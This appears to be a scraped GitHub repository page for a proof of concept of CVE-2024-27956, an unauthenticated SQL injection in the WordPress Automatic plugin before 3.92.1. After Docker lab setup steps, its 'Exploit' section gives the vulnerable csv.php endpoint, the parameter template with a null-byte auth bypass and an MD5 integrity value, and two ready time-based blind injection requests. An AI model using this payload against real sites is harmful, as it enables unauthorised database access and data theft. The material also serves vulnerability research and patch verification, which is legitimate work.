truonghuuphuc / CVE-2024-27956

CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2024-27956

Note

Build wordpress: docker-compose -f stack.yml up

Install plugin:

  1. WordPress dashboard, choose Plugins > Add New

  2. Click Upload Plugin

image

  1. Choose File -> wp-automatic.zip -> Install Now

image

  1. After the installation is complete, click Activate Plugin

image

Exploit

<HOST>/wp-content/plugins/wp-automatic/inc/csv.php

q={{query}}&auth=%00&integ={{md5query}}

q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f

image

q=SELECT+IF(1=2,sleep(5),sleep(0))&auth=%00&integ=4b1f4024af81df56c3b00679b9b52183

image

About

CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection